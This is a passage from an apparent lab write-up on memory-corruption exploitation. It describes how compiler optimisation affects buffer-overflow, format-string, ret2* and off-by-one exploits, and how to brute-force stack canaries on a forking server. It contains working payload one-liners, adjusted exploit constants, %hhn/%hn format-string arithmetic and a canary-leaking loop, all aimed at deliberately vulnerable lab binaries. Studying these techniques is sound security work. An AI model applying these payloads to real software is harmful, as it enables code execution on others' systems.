In addition, such an exploit can easily be mitigated by stack canaries, which is not possible with the non-optimized variant of the executable, as in the non-optimized version not the control flow information but only the function’s data is overwritten.</p>
<p>In conclusion, compiling this executable with compiler optimizations enabled still provides a buffer overflow vulnerability but it becomes a lot harder to exploit it and there is no easy way to see how this could be achieved with meaningful results.</p>
<h3 id="integer-overflow">Integer overflow</h3>
<p>Concerning the <code>width</code> executable, the original exploit does not work anymore if the executable was compiled with the <code>-O3</code> compiler flag. However, the fix is extraordinarily easy. Only offsets and addresses changed because fewer values are actually put on the stack. For example, <code>char bsize = 64;</code> is not a stack variable now, but the value <code>64</code> for comparisons is hardcoded into the binary code. In addition, the <code>secret</code> function is now located at another position in the executable because of structural rearrangements.</p>
<p>In general, the kind of exploit and how it works does not change; we only need to slightly change the padding and the address. Thus, the command <code>./width $(python3 -c &quot;import sys; sys.stdout.buffer.write(b'A' * 68 + b'\x50\x92\x04\x08' + b'A' * 56)&quot;)</code> reliably lets us jump to the secret function or wherever we want to jump.</p>
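<p>The payload in this command is 68 + 4 + 56 = 128 bytes long. The sketch below shows why this length is interesting under the assumption (not confirmed by the source shown here) that the program stores the input length in a signed 8-bit variable before comparing it with <code>64</code>.</p>

```python
import ctypes

payload_len = 68 + 4 + 56

# Assumption: the length is truncated to a signed 8-bit value (a C `char`
# on x86) before the size check; ctypes reproduces the wrap-around.
as_char = ctypes.c_int8(payload_len).value

# A negative length passes a "smaller than 64" check although the real
# input is twice as long as the limit.
passes_check = as_char < 64

print(payload_len, as_char, passes_check)
```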
<p>For the <code>signedness</code> executable, the possibility to achieve a buffer overflow completely disappears. With optimization enabled, GCC’s analysis determines that the two buffers <code>char src[1024]</code> and <code>char dest[1024]</code> aren’t used in the further program flow and don’t contain any specialized data. Thus, they simply are completely omitted as well as the call to <code>memcpy</code> operating on those buffers. Of course, without buffers there is no possibility to overflow them and thus change the control flow.</p>
<p>However, it is still possible to observe the original vulnerability: If inputting a negative number, the size check succeeds and the program still prints out how many bytes it intended to copy, even though no actual copying is done.</p>
<h3 id="stack-divulging-methods-1">Stack divulging methods</h3>
<p>For the stack divulging methods, the <code>divulge</code> executable which creates a vulnerable network service is used. The vulnerability lies in the <code>function</code> function: This function has a buffer overflow vulnerability to change the control flow as well as a string format vulnerability to leak information about stack layout and addresses.</p>
<p>The original exploit works by overwriting the return address with the address of a buffer where we wrote our shellcode. The address of the buffer can be determined manually (by leaking the stack base address with <code>cat /proc/$(pidof divulge)/stat | awk '{ print $28 }'</code>) or automatically (by leaking data from the stack with the string format vulnerability). In both cases, the return address of <code>function</code> is then overwritten with the address of the buffer.</p>
<p>This is where the problem occurs: Because of compiler optimizations being enabled, the function <code>function</code> was completely inlined into <code>main</code>. This means that it never returns. As <code>main</code> itself has an infinite loop, the compiler also didn’t include a <code>ret</code> instruction for <code>main</code>. This means that we cannot overwrite a return address which lets us return to user-controlled code, as none of our functions ever returns.<br />
Additionally, there are no indirect <code>call</code> or <code>jmp</code> instructions which depend on stack data that we could theoretically control.</p>
<p>In conclusion, the stack buffer overflow vulnerability still exists but it remains unclear how it could be exploited to gain control over the code execution. It is more likely that the string format vulnerability can be exploited to e.g. overwrite entries in the global offset table (GOT). However, short experiments showed that even this is not easy, as</p>
<ol type="1">
<li>no “useful” functions like <code>system</code>, <code>execve</code> or similar can be found in the code and</li>
<li>the program quickly crashes if the input string is expanded too much (e.g. by <code>%.2000x</code> string format literals) in <code>sprintf</code> and it is thus necessary to overwrite an address in the GOT byte by byte (i.e. several <code>%hhn</code> string format literals instead of a single <code>%n</code>).</li>
</ol>
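<p>Writing an address byte by byte with <code>%hhn</code> keeps every single padding below 256 characters. A sketch of the required paddings, assuming the four target addresses (16 bytes) are printed first and taking the value <code>0x080490a0</code> purely as an example:</p>

```python
def hhn_paddings(value, already_printed):
    """Padding before each of four %hhn writes, least significant byte first."""
    paddings = []
    count = already_printed
    for i in range(4):
        byte = (value >> (8 * i)) & 0xFF
        # %hhn stores the character count modulo 256.
        pad = (byte - count) % 256
        paddings.append(pad)
        count += pad
    return paddings


# Example value only; 16 characters are assumed to be printed beforehand.
print(hhn_paddings(0x080490A0, 16))
```

<p>Very small paddings need extra care in a real format string, as a conversion such as <code>%x</code> may print more characters than the requested minimum.</p>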
<h3 id="stack-juggling-methods-1">Stack juggling methods</h3>
<h4 id="ret2ret-1">ret2ret</h4>
<p>The goal of the <a href="#ret2ret">ret2ret</a> attack is to overwrite the buffer with return instructions so that the last byte of an existing pointer (here: <code>int *ptr</code>) is overwritten with <code>0x00</code> and then points into the NOP sled of our shellcode buffer. This exploit does not always work, but it does most of the time.</p>
<p>An interesting observation concerning the optimized version of the executable is that <code>int no = 1; int *ptr = &amp;no</code> is completely omitted by the compiler. However, the pointer <code>char *argv[]</code> (a pointer to a pointer) can be found on the stack. Sometimes, this pointer’s address is close enough to the address of <code>argv[1]</code> (which contains the shellcode) so that overwriting the last byte of this pointer and returning to it results in a jump into the NOP sled of our shellcode.</p>
<p>This behavior is much more unreliable than overwriting the last byte of a fixed pointer, as the fixed pointer always points onto the stack with a fixed offset and we only depend on ASLR to generate addresses in such a way that overwriting the last byte with <code>0x00</code> results in a valid address inside our NOP sled. With the behavior of the optimized executable, we also depend on the execution environment to position the program arguments at addresses that fit our needs.</p>
<p>Of course, for the exploit to work, the return address has to be changed, as the newly compiled executable has different addresses and offsets of the instructions inside the executable. Changing <code>#define RETADDR 0x080491e6</code> to <code>#define RETADDR 0x08049093</code> in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c#L7">line 7 of the ret2retexploit.c</a> source file and recompiling fixes this issue.</p>
<h4 id="ret2pop-1">ret2pop</h4>
<p>The <a href="#ret2pop">ret2pop</a> attack works similarly to the <a href="#ret2ret">ret2ret</a> attack: We overwrite the return address and following stack space with the address of a return instruction until we reach a pointer we actually want to return to.</p>
<p>In the non-optimized version, this pointer was the function call argument for the function <code>function</code> which was a pointer to <code>argv[1]</code> which contains our shellcode. Because it was passed to the function, a copy of the address was pushed on the stack before calling the function and thus was close in memory / on the stack to our buffer we wanted to overflow.</p>
<p>In the version compiled with compiler optimizations enabled, the function <code>function</code> is inlined into <code>main</code>. Thus, we cannot overwrite the function’s return address and return to its function argument. But as an alternative, we can overwrite <code>main</code>’s return address and return to <code>argv[1]</code>. The downside of this approach is that the pointer to <code>argv[1]</code> is located on the stack pretty far away from our buffer we want to overflow so that we need to overwrite more of the stack with the address of a <code>ret</code> instruction.</p>
<p>Basically, instead of returning from <code>function</code> to its own argument, we return from <code>main</code> to <code>argv[1]</code>. This can be achieved by changing <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c#L7">lines 7 - 10 of ret2popexploit.c</a> from</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb21-1" data-line-number="1"><span class="pp">#define POPRETADDR 0x08049243</span></a>
<a class="sourceLine" id="cb21-2" data-line-number="2"><span class="pp">#define RETADDR 0x08049009</span></a>
<a class="sourceLine" id="cb21-3" data-line-number="3"><span class="pp">#define BUFFSIZE 264</span></a>
<a class="sourceLine" id="cb21-4" data-line-number="4"><span class="pp">#define CHAINSIZE 4</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb22"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb22-1" data-line-number="1"><span class="pp">#define POPRETADDR 0x08049263</span></a>
<a class="sourceLine" id="cb22-2" data-line-number="2"><span class="pp">#define RETADDR 0x080490a6</span></a>
<a class="sourceLine" id="cb22-3" data-line-number="3"><span class="pp">#define BUFFSIZE 408</span></a>
<a class="sourceLine" id="cb22-4" data-line-number="4"><span class="pp">#define CHAINSIZE 152</span></a></code></pre></div>
<p>which adapts the addresses to the differently compiled executable, drastically increases the size of the input we’re using to overflow the vulnerable buffer and also increases the chain size (i.e. number of <code>ret</code> instructions until we reach the desired location on the stack).</p>
<p>With this change, the exploit works again exactly like it was supposed to.</p>
<h4 id="ret2esp-1">ret2esp</h4>
<p>The <code>ret2esp</code> executable is also affected by compiler optimizations. Firstly, the function <code>function</code> containing the vulnerable <code>strcpy</code> call is inlined into main. Thus, we cannot overwrite the return address of <code>function</code> but only that of <code>main</code>. Secondly, we already had to add the integer <code>int j = 58623;</code> to the code in the first place, as this integer in hexadecimal encodes the opcode for <code>jmp esp</code>. In the optimized version of the executable, this integer is omitted, as it is not used anywhere in the code.</p>
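<p>The encoding can be checked quickly. The following Python sketch (not part of the original sources; the variable names are illustrative) shows that the little-endian representation of <code>58623</code> starts with the bytes <code>ff e4</code>, which is the x86 machine code for <code>jmp esp</code>:</p>

```python
# 58623 == 0xe4ff; stored little endian on x86, its first two bytes in memory are ff e4.
j = 58623
encoded = j.to_bytes(4, "little")  # how a 4-byte int is laid out in memory on x86

JMP_ESP = bytes([0xFF, 0xE4])      # machine code of `jmp esp`
print(hex(j), encoded.hex())
print(encoded.startswith(JMP_ESP))
```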
<p>Therefore, we still have a buffer overflow vulnerability but cannot exploit it the way we intended to (<code>jmp esp</code> to jump directly to the shellcode on the stack). This problem can be solved by adding a <code>printf(&quot;%d\n&quot;, j);</code> call at the end of <code>main</code> of <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2esp.c">ret2esp.c</a>. This call ensures that the integer <code>j</code>, or at least its value, is not omitted during compilation, as it is now used in the code.<br />
In addition to that, the address of the encoded <code>jmp esp</code> instruction changed, as the structure of the compiled executable differs when compiled with compiler optimizations enabled. Also, <code>j</code> is not put on the stack but kept in a register, so that the padding to reach the return address can be decreased by the amount of memory the integer takes up on the stack (i.e. 4 bytes). Thus, it is also necessary to change</p>
<div class="sourceCode" id="cb23"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb23-1" data-line-number="1"><span class="pp">#define JMPESPADDR 0x80491c5</span></a>
<a class="sourceLine" id="cb23-2" data-line-number="2"><span class="pp">#define PADDING 264</span></a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb24"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb24-1" data-line-number="1"><span class="pp">#define JMPESPADDR 0x80490bf</span></a>
<a class="sourceLine" id="cb24-2" data-line-number="2"><span class="pp">#define PADDING 260</span></a></code></pre></div>
<p>in <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2espexploit.c#L7">ret2espexploit.c</a>.</p>
<p>Both of the described changes are necessary, as the first one ensures the inclusion of a <code>jmp esp</code> instruction and the second one accounts for the changed addresses and stack layout.</p>
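<p>As a rough illustration of the resulting input, the Python sketch below assembles a payload from the two constants. It assumes the usual <code>ret2esp</code> layout (padding up to the return address, then the address of <code>jmp esp</code>, then the shellcode); the placeholder shellcode and the helper name <code>build_payload</code> are hypothetical and not taken from <code>ret2espexploit.c</code>.</p>

```python
JMPESPADDR = 0x80490BF  # address of the encoded `jmp esp` in the optimized binary
PADDING = 260           # bytes needed to reach the return address of main

def build_payload(shellcode):
    """Assumed layout: padding | address of jmp esp | shellcode."""
    return b"A" * PADDING + JMPESPADDR.to_bytes(4, "little") + shellcode

# Placeholder bytes (int3 breakpoints) standing in for real shellcode.
payload = build_payload(b"\xcc" * 4)
print(len(payload), payload[PADDING:PADDING + 4].hex())
```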
<h4 id="ret2eax-1">ret2eax</h4>
<p>In the <code>ret2eax</code> executable, the vulnerable function <code>function</code> is inlined into the main function. This poses a problem, as we were relying on implicitly having the register <code>eax</code> set to the address of the buffer containing the shellcode, as this address is returned by <code>strcpy</code> in the <code>eax</code> register. Here, we’re only returning from <code>main</code> but not from the vulnerable function. Unfortunately, <code>eax</code> does not contain the address of the shellcode buffer anymore on returning from <code>main</code>, as <code>main</code> returns with the value 0 and thus <code>eax</code> is set to 0 by an <code>xor eax, eax</code> instruction before the <code>ret</code> instruction.</p>
<p>Not even removing the return statement from <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c#L10">ret2eax.c</a> solves this problem, as the compiler then returns 0 from <code>main</code> implicitly instead of explicitly and thus outputs the same compiled code.</p>
<p>However, a solution is to change</p>
<div class="sourceCode" id="cb25"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb25-1" data-line-number="1"><span class="dt">int</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {</a>
<a class="sourceLine" id="cb25-2" data-line-number="2">    function(argv[<span class="dv">1</span>]);</a>
<a class="sourceLine" id="cb25-3" data-line-number="3">    <span class="cf">return</span> <span class="dv">0</span>;</a>
<a class="sourceLine" id="cb25-4" data-line-number="4">}</a></code></pre></div>
<p>into</p>
<div class="sourceCode" id="cb26"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb26-1" data-line-number="1"><span class="dt">void</span> main(<span class="dt">int</span> argc, <span class="dt">char</span> *argv[]) {</a>
<a class="sourceLine" id="cb26-2" data-line-number="2">    function(argv[<span class="dv">1</span>]);</a>
<a class="sourceLine" id="cb26-3" data-line-number="3">    <span class="cf">return</span>;</a>
<a class="sourceLine" id="cb26-4" data-line-number="4">}</a></code></pre></div>
<p>as a <code>void</code> function has no specific return value and <code>eax</code> thus is not modified after <code>strcpy</code> returns. Therefore, <code>eax</code> still contains the address of the buffer containing the shellcode when <code>main</code> returns. As we overwrote the return address with the address of a <code>call eax</code> instruction, the shellcode in the buffer is executed.</p>
<p>An interesting observation is that with this change and no change made to the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eaxexploit.c">actual exploit code</a>, the exploit works for both the non-optimized and the optimized executable. This is because the address of the <code>call eax</code> instruction stayed the same and the exploit writes this address to the stack several times. In both cases, one of these copies overwrites the return address (no matter whether it is the return address of <code>function</code> or of <code>main</code>). In the optimized version we also overwrite stack space after the return address (i.e. too much of the stack), but this does no harm to the exploit itself.</p>
<h3 id="got-hijacking---ret2got-1">GOT hijacking - ret2got</h3>
<p>The <a href="#got-hijacking---ret2got">ret2got</a> exploit does not work anymore as it is pretty similar to the <a href="#string-pointers">string pointer redirection</a> exploit. Here, the goal is to overwrite the pointer <code>ptr</code> on the stack so that the pointer points to the global offset table (GOT). The next <code>strcpy(ptr, argv[2]);</code> call then copies the second command line argument into the GOT instead of into the provided buffer.</p>
<p>Because of compiler optimizations, the pointer <code>char *ptr</code> is completely omitted. There is also no easy way to force the program to insert this pointer as it is always calculated relative to the buffer address on the fly (i.e. instead of loading the desired address from the stack (from <code>ptr</code>), it is calculated via <code>lea</code> assembly instructions (relative to <code>char array[8]</code>)). Thus, there is simply no address on the stack that we could manipulate so that the write destination of <code>strcpy</code> changes.</p>
<p>However, there is a way to get the exploit working again because the buffer overflow vulnerability is not automatically patched by these optimizations. Instead of overwriting the pointer, we can still classically overwrite the return address with the address of <code>system</code> and put the corresponding argument (i.e. the address of a string) onto the stack. This allows us to still execute any program we want. However, we now rely on no stack canaries being present, as we not only overwrite non-protected data but also protected control flow information on the stack.</p>
<p>The <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2gotexploit_optimized.sh">final exploit</a> (working only with the optimized variant of the executable) is then pretty similar to the <a href="./ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/strptrexploit_optimized.sh">exploit</a> for the <a href="#string-pointers-1">optimized string pointer redirection</a>.</p>
<h3 id="off-by-one-1">Off by one</h3>
<p>The <a href="#off-by-one">off-by-one exploit</a> is based on two things:</p>
<ol type="1">
<li>Directly after the vulnerable buffer there is control flow information on the stack.</li>
<li>That control flow information (usually) is the saved frame pointer which (when modified to point to a lower address by overwriting the least significant byte with <code>0x00</code>) enables us to set the stack pointer to that address in the function we return to so that that function returns to a controlled address instead of the original return address.</li>
</ol>
<p>Both of those points are not satisfied when the <code>offbyone</code> executable is compiled with compiler optimizations enabled.<br />
There is simply no control flow information on the stack directly after the vulnerable buffer when looking at the stack frame of the <code>save</code> function. Firstly, instead of frame base pointer relative addressing (i.e. saving the old frame base pointer to the stack (= saved frame pointer), replacing the frame base pointer with the new frame base pointer (<code>mov %esp, %ebp</code>), addressing relative to <code>ebp</code> (e.g. <code>pushl 0x8(%ebp)</code>)), the optimized executable uses stack pointer relative addressing (i.e. does not save nor use the <code>ebp</code> register but only <code>esp</code> (e.g. <code>mov 0x108(%esp), %ebx</code>)).<br />
Secondly, the optimized variant uses <code>ebx</code> as a register regularly which is a <a href="https://en.wikipedia.org/wiki/X86_calling_conventions#Register_preservation">callee-saved register</a>. Thus, instead of <code>ebp</code>, <code>ebx</code> is pushed onto the stack (i.e. saved) in the function prologue and popped from the stack (i.e. restored) in the function epilogue (see assembly below). As <code>ebx</code> in our case does not contain any useful control flow information (in fact, it does not contain any useful information at all as the register’s content is discarded after returning from the <code>save</code> function), we cannot gain any control by overwriting the least significant byte with <code>0x00</code> (which is all we can do by this kind of exploit). Thus, we cannot control the control flow by overwriting meaningful data.</p>
<p>As a reference, the function prologue and epilogue in the non-optimized executable are of the form (comments added for clarification)</p>
<div class="sourceCode" id="cb27"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb27-1" data-line-number="1"><span class="bu">push</span>   %<span class="kw">ebp</span>         # save <span class="kw">ebp</span></a>
<a class="sourceLine" id="cb27-2" data-line-number="2"><span class="bu">mov</span>    %<span class="kw">esp</span>,%<span class="kw">ebp</span>    # set new <span class="kw">ebp</span></a>
<a class="sourceLine" id="cb27-3" data-line-number="3"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x100,</span>%<span class="kw">esp</span>  # increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb27-4" data-line-number="4">.</a>
<a class="sourceLine" id="cb27-5" data-line-number="5">.</a>
<a class="sourceLine" id="cb27-6" data-line-number="6">.</a>
<a class="sourceLine" id="cb27-7" data-line-number="7"><span class="bu">leave</span>               # <span class="pp">restore</span> <span class="kw">ebp</span> (<span class="bu">leave</span> == <span class="bu">mov</span> %<span class="kw">ebp</span>, %<span class="kw">esp</span><span class="co">; pop %ebp)</span></a>
<a class="sourceLine" id="cb27-8" data-line-number="8"><span class="bu">ret</span>                 # return</a></code></pre></div>
<p>whereas in the optimized executable they are of the form (comments added for clarification)</p>
<div class="sourceCode" id="cb28"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb28-1" data-line-number="1"><span class="bu">push</span>   %<span class="kw">ebx</span>         # save <span class="kw">ebx</span></a>
<a class="sourceLine" id="cb28-2" data-line-number="2"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x100,</span>%<span class="kw">esp</span>  # increase <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb28-3" data-line-number="3">.</a>
<a class="sourceLine" id="cb28-4" data-line-number="4">.</a>
<a class="sourceLine" id="cb28-5" data-line-number="5">.</a>
<a class="sourceLine" id="cb28-6" data-line-number="6"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x10c,</span>%<span class="kw">esp</span>  # reduce <span class="bu">stack</span> size</a>
<a class="sourceLine" id="cb28-7" data-line-number="7"><span class="bu">pop</span>    %<span class="kw">ebx</span>         # <span class="pp">restore</span> <span class="kw">ebx</span></a>
<a class="sourceLine" id="cb28-8" data-line-number="8"><span class="bu">ret</span>                 # return</a></code></pre></div>
<p>These code examples support the above points concerning the non-exploitability of the off-by-one-vulnerability in this case.</p>
<h3 id="overwriting-.dtors-1">Overwriting .dtors</h3>
<p>For the optimized executable, the same restrictions and changes apply as for the non-optimized executable (cf. <a href="#overwriting-.dtors">the section about the original exploit</a>).</p>
<p>The same exploit works with three slight changes:</p>
<ol type="1">
<li>The address of the <code>.fini_array</code> section now is <code>0x0804b17c</code> instead of <code>0x0804b168</code>. Thus, the address (provided at the start of the exploit string) has to be changed.</li>
<li>When we want to reference that address from the exploit string, it is not the first argument to <code>snprintf</code> on the stack (i.e. accessed by the <code>%hn</code> format string placeholder) but the fourth (i.e. accessed by the <code>%4$.hn</code> format string placeholder).</li>
<li>The address of the <code>globalbuff</code> array in the <code>.bss</code> section changed. Concretely, it increased by 32 which is why we also have to increase the number to overwrite the address in <code>.fini_array</code> with by 32 (i.e. 45756 “A”s for padding instead of 45724). If using a <code>%x</code> format string placeholder instead of the “A”s for padding, we can also write <code>%.45756x</code> instead for expanding the format string to the correct length we need.</li>
</ol>
<p>Thus, we can either use <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x7c\xb1\x04\x08' + b'A' * 45756 + b'%4$.hn')&quot;)&quot;</code> (padding with “A”s) or <code>./ret2dtors &quot;$(./shellcode)&quot; &quot;$(python3 -c &quot;import sys; sys.stdout.buffer.write(b'\x7c\xb1\x04\x08 %.45754x %4$.hn')&quot;)&quot;</code> (format string expansion, 45754 here because of the two spaces) for a working exploit after adapting the addresses and offsets.</p>
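<p>Both variants write the same value because the number of characters printed before the <code>%hn</code> placeholder is identical. A small Python check of this arithmetic (a sketch; it only counts characters and assumes that <code>%.45754x</code> expands to exactly 45754 characters):</p>

```python
ADDR_LEN = 4  # the .fini_array address at the start of the format string

# Variant 1: address followed by 45756 literal "A"s.
count_padding = ADDR_LEN + 45756

# Variant 2: address, space, %.45754x (45754 characters), space.
count_expansion = ADDR_LEN + 1 + 45754 + 1

# %hn stores the low 16 bits of the number of characters written so far.
written = count_padding % 0x10000
print(count_padding, count_expansion, hex(written))
```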
<h1 id="stack-canary-bypassing">Stack canary bypassing</h1>
<p>In the previous sections, I have described how to bypass ASLR, non-executable stack, etc. based on several tutorials. This section now aims to bypass stack protection by stack canaries and analyzes how stack canaries are used.</p>
<p>For the whole section, ASLR is enabled.</p>
<h2 id="stack-analysis---getcanary-and-getcanarythreaded">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></h2>
<p>The <code>getCanary</code> and <code>getCanaryThreaded</code> executables were created to output parts of the stack to <code>stdout</code> in order to analyze them. In order to have a stack structure as realistic as possible, ASLR is enabled and no stack protection mechanisms enabled by default in GCC were disabled.</p>
<p>The <a href="./Stack%20canary%20bypassing/getCanary.c">getCanary</a> executable forks in the <code>main</code> function and then outputs stack contents from both processes.<br />
The interesting point to observe here is that the addresses (be it stack addresses or return addresses on the stack) are the same for both processes. This makes sense, as the child process forked from the parent process gets an exact copy of the parent process’ virtual memory. In addition, the stack canary is also the same. This is because of the same reason: the virtual memory is an exact copy. However, the function of which we output the stack canary is called after forking so that it could theoretically be possible to instantiate new stack canaries for a new process.<br />
The combination of the addresses and the stack canaries staying the same can be dangerous: assume we have a vulnerable daemon (e.g. reachable over the network) that forks on every call to it. An attacker can then make as many calls as he wishes to the daemon and has the same memory layout as well as the same stack canary on every call. Thus, he can gather all the information he needs in order to craft an exploit for the vulnerability.<br />
Additionally, the stack canary is the same for every function. This allows an attacker to gather information about the stack canary through one vulnerable function of an executable and apply the gathered information in an exploit targeting a completely different function of the same executable.</p>
<p>The <a href="./Stack%20canary%20bypassing/getCanaryThreaded.c">getCanaryThreaded</a> executable creates two threads which output stack contents from both threads to <code>stdout</code>. The difference to the <code>fork</code> approach from above is that we’re only creating threads here and no distinct processes. The threads live in the same address space as the process creating the threads and don’t get assigned their own process ID. Of course they still have to work on their own stack in order to not clash with each other’s memory. For that reason, the memory addresses now differ and we achieve a kind of address randomization for the threads. However, this statement has a severe restriction: the memory offset between the threads’ stacks is constant (here: <code>0x801000</code>). Thus, one can calculate the stack addresses of other threads by adding or subtracting this constant offset to or from a leaked stack address of the current thread.<br />
For the stack canaries, the same holds true as above. The stack canaries are the same for any thread of the currently running process. Thus, an attacker can again query a vulnerable daemon that creates new threads upon calls to it as often as he wishes to obtain information about the stack canary.<br />
An interesting observation here is that overwriting the stack canary of a thread does not cause an error. However, there is no saved frame pointer or return address directly after the stack canary on the thread’s stack that we could overwrite in order to reroute the control flow of the process. Nevertheless, we can gather information about the stack canary from the threads and apply that knowledge elsewhere in the same process without having to fear a change of the stack canary.</p>
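<p>The constant thread stack offset mentioned above makes the address calculation trivial. A minimal Python sketch; the leaked address is a made-up example value and the helper name is hypothetical, only the offset <code>0x801000</code> is taken from the observation above:</p>

```python
THREAD_STACK_OFFSET = 0x801000  # constant distance observed between the thread stacks

def neighbour_stack_addresses(leaked):
    """Return the corresponding addresses on the adjacent thread stacks."""
    return leaked - THREAD_STACK_OFFSET, leaked + THREAD_STACK_OFFSET

# Hypothetical stack address leaked from the current thread.
leaked_address = 0x7F1234567E40
lower, upper = neighbour_stack_addresses(leaked_address)
print(hex(lower), hex(upper))
```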
<p>An observation common to both executables is that the first byte of the stack canary (in the output: the last byte because of little endian representation) is always a <code>0x00</code> byte. This fact probably on the one hand aims to prevent string based functions (e.g. <code>printf</code>, <code>strcpy</code>, etc.) from reading the stack cookie, as the null byte marks the end of a string and functions like that thus don’t continue after such a byte is encountered. On the other hand, this means that an attacker would have to include a null byte in his payload if he wants to overwrite the stack canary with the correct value. Again, string based functions stop when reaching a null byte so that an attacker can’t use such functions to overwrite the other bytes of the canary.</p>
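<p>The effect of the leading null byte can be illustrated with a short Python sketch. The canary value is invented for the example (only its <code>0x00</code> low byte reflects the observation above), and <code>c_strcpy</code> is a hypothetical stand-in that merely mimics where a C string copy stops:</p>

```python
def c_strcpy(src):
    """Mimic strcpy: copy bytes up to (not including) the first null byte."""
    return src.split(b"\x00", 1)[0]

# Hypothetical canary value with a 0x00 least significant byte.
canary = 0x5AD3C1F09E7B4200
in_memory = canary.to_bytes(8, "little")  # byte at the lowest address comes first

# An attacker payload that tries to carry the canary behind 16 bytes of padding.
payload = b"A" * 16 + in_memory
copied = c_strcpy(payload)
print(in_memory[0], len(payload), len(copied))
```

<p>The copy ends right at the canary’s first byte in memory, so none of the remaining seven canary bytes can be written through such a function.</p>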
<h2 id="brute-force-leaking">Brute force leaking</h2>
<p>The <a href="./Stack%20canary%20bypassing/echoserver.c">echoserver</a> executable was crafted to specifically contain a buffer overflow vulnerability. It was compiled using the default compiler and linker flags of GCC and thus has stack canaries enabled. The general behavior is as follows: The main process (i.e. the manually started <code>echoserver</code> process) listens for incoming connections. On new connections, it forks and lets the newly created child process handle the connection while the parent process itself just continues waiting for new connections.<br />
The child process in the meantime reads into a buffer. However, the maximum number of bytes to read from the input stream is bigger than the buffer, which is why we can achieve a buffer overflow. When we overwrite the stack canary with an incorrect value, the process exits with an error message stating that “stack smashing [has been] detected”. Thus, it is easy to leak the canary: whenever we guess right, the process outputs a success message to the remote shell (i.e. the client’s shell) and exits normally. Whenever we guess incorrectly, the process yields an error message on the local shell (i.e. the server’s shell).</p>
<p>The approach to leak the stack canary is then to overwrite the canary byte by byte until for each byte we receive a success message and the process exits normally. This is possible because of the <a href="#stack-analysis---getcanary-and-getcanarythreaded">previously</a> observed behavior that the stack canary doesn’t change on forking, as the child process’ memory is an exact copy of the parent process’ memory. This includes the stack including the stack canaries as well.</p>
<p>This is exactly what is done in the <a href="./Stack%20canary%20bypassing/leak_canary.py">leak_canary.py</a> Python script: it connects to the vulnerable server over and over again and with each request tries to overwrite a byte of the stack canary. If it succeeds (i.e. a success message is returned), the current byte is saved and the next canary byte is evaluated. Step by step, this script recovers all 8 of the stack canary bytes.</p>
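<p>The core loop of such a script can be sketched without any networking. The following Python example is not the code of <code>leak_canary.py</code>; it replaces the server with a local oracle function (<code>child_survives</code>, a hypothetical name) that behaves like a freshly forked child with an unchanged canary:</p>

```python
import os

# Simulated canary: the first byte in memory is 0x00, the rest is random.
SECRET_CANARY = b"\x00" + os.urandom(7)

def child_survives(overflow):
    """Simulated forked child: it exits normally only if every overwritten
    canary byte matches. The canary is identical for every 'connection'."""
    return SECRET_CANARY.startswith(overflow)

def leak_canary(oracle, length=8):
    """Recover the canary one byte at a time, with at most 256 guesses per byte."""
    known = b""
    for _ in range(length):
        for guess in range(256):
            candidate = known + bytes([guess])
            if oracle(candidate):
                known = candidate
                break
        else:
            raise RuntimeError("no candidate byte was accepted")
    return known

leaked = leak_canary(child_survives)
print(leaked.hex(), leaked == SECRET_CANARY)
```

<p>Because each byte is confirmed separately, at most 8 * 256 = 2048 requests are needed instead of a search over the whole 64-bit value.</p>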
<p>The important observation is that even after we leaked the stack canary, the main process is still running correctly. This means that we could exploit the stack buffer overflow and overwrite the return address with any value we wish, as we previously recovered the stack canary successfully.</p>
<h2 id="extended-brute-force-leaking">Extended brute force leaking</h2>
<p>The <a href="#brute-force-leaking">above section</a> describes how the stack canary of a fictional vulnerable server that is based on forking in order to handle requests can be leaked.</p>
<p>An interesting approach is then to extend this idea in order to not only leak the stack canary but also gather information about the address space of the executable, which allows us to bypass the restrictions imposed by ASLR.</p>
<p>The following attacks are all targeting the <code>echoserver</code> executable already mentioned in the <a href="#brute-force-leaking">previous section</a>.</p>
<h3 id="leaking-saved-frame-pointer-and-return-instruction-pointer-return-address">Leaking saved frame pointer and return instruction pointer / return address</h3>
<p>The idea is based on the following stack layout extracted by analyzing the binary (each row corresponds to 8 bytes):</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved frame pointer               |     |
                +-----------------------------------+     |
                | stack canary                      |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     +--- stack frame of echo
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+     |
                | ssize_t n                         |     |
                +-----------------------------------+     |
                | uint64_t *canary                  |     |
                +-----------------+-----------------+     |
                | copy of int fd  |       junk      |     |
                +-----------------+-----------------+  ---+
lower address   |                                   |</code></pre>
